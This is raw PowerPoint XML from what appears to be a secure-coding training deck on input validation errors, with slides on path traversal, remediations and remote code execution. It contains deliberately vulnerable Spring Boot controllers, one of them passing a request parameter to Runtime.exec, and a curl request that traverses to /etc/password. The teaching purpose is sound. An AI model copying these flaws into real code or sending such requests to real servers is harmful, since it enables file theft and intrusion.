              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>development</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> time)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>2/, 3/, ...  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> as SQL Injection ...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6070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6B6A-42B2-517B-D114-9F5EF6E44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XSS[4/4]   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detect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/fix at Runtime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F9594-EB12-FF2F-1A8A-CECBF1B072D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3224213" y="3186113"/>
            <a:ext cx="70294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using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" b="1" dirty="0"/>
              <a:t>WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>"  = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" b="1" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>eb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" b="1" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>pplication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>ireWall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=&gt; http </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> and body contents/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>responses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> can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dynamically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>analyzed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>mutated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666551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C0F8C-AF82-593C-F371-40DFEB6E5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9817-CB07-4378-E045-AF6292D6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6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Common "Input Validation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/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EBC19-BFF1-92E2-F707-E56490DBAAD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4243389" y="1714501"/>
            <a:ext cx="4513864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SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Directory Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Traversal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Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>External</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Entity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> (XXE) Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Deserialization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etc...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ED93F7-E8FA-F716-1981-9F0C2CEF0697}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3686175" y="1619250"/>
            <a:ext cx="5581650" cy="13906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0E9B87-72EA-6ABC-08D6-8D1550C50855}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3786187" y="3895725"/>
            <a:ext cx="5481638" cy="280767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77B6603-6B1C-DCFA-918A-3A302305F077}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3214687" y="3212306"/>
            <a:ext cx="657225" cy="4333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4039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BD57-F85F-0E9F-B79E-9AD5D0D5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365125"/>
            <a:ext cx="11801474" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t>Directory Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>Traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> [1/3] : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>Vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> Code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3C3F8-D0E1-6615-3713-7AD59AC28E80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2671764" y="1690688"/>
            <a:ext cx="801321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@Controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>public class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>FileController</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>    @GetMapping("/download")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>    public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>ResponseEntity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>&lt;Resource&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>downloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>@RequestParam("filename") String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>filename</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>    ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>throws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>IOException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>        Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>filePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Paths.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>("/var/www/files", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>        Resource </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>fileResource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>UrlResource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>filePath.toUri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>        ... check file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>exist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>readable</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>        return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>ResponseEntity.ok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>().body(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>fileResource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="24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58279-2326-260B-AD70-14FCA9E1D08E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266700" y="3724245"/>
            <a:ext cx="1691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example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Java Code</a:t>
            </a:r>
          </a:p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SpringBoot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7691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A6146-F41C-D0AE-7AC4-1F6E4012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365125"/>
            <a:ext cx="11725275" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t>Directory Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>Traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> [2/3] : Attack &amp; Impact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FE43A-C2DC-54E4-D1AB-C10E387B9091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257300" y="2962573"/>
            <a:ext cx="947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curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> http://webserver/download?filename=../../../etc/password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9EAC709-8669-84FC-3D48-E0663360D5F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="17919924">
            <a:off x="7058993" y="3695702"/>
            <a:ext cx="909637" cy="342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F73599-829C-8EC9-3BCB-5DCE1D827A6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5414963" y="4430494"/>
            <a:ext cx="6289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web server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>serving</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> relative to  "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>/var/www/files"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>=&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>reading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t> File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>outside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t> of server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12465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7798-987D-BC20-F9A5-33FE45E4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Directory Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>Traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0"/>
              <a:t> [3/3] : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" dirty="0" err="1"/>
              <a:t>Remediations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D880C-342B-C27E-FB29-A4DBE2678EAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2119313" y="2114551"/>
            <a:ext cx="81770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1/, 2/, 3/, ...   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> as SQL Injection :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>sanitize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>fields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At runtime, can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>isolate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> web server to have few </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>read-only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>   to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>stricty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>required</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>- use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>very</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>low-privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>- use "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>" (= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>jail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> ) for running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>   (more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>advance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>containerization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>virtualization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> of servers)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306364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494C1-7449-38E4-71F1-969A62D69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C293D-D1A0-E44E-B7DD-663082A35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6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Common "Input Validation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/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BB88D-4AF9-2640-79EB-3A7F6C823E5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4243389" y="1714501"/>
            <a:ext cx="4513864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SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Directory Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Traversal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Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>External</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Entity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> (XXE) Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Deserialization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etc...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862FE3-067A-935E-32B6-A1EEE4C6FA98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3686175" y="1619249"/>
            <a:ext cx="5581650" cy="205263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A66994-6DDC-D642-C9E3-15B44B6AE4EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3786187" y="4552950"/>
            <a:ext cx="5481638" cy="205263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FEE63B1-04C5-D778-6501-2696E6CDAE76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3209925" y="3895724"/>
            <a:ext cx="657225" cy="4333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56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AE099-D856-5806-2C64-AAFD03B74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13"/>
            <a:ext cx="10515600" cy="1062037"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>  (RCE)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A35DE-9AE7-97A8-DC2D-8AC2FCFA6BBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3405187" y="2155061"/>
            <a:ext cx="744082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@RestController</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>public class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>CommandController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    @GetMapping("/execute")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>    public String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>executeCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(@RequestParam("cmd") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>String command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>        Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Runtime.getRuntime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>(command);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>        String output = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>IOUtils.readFully</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
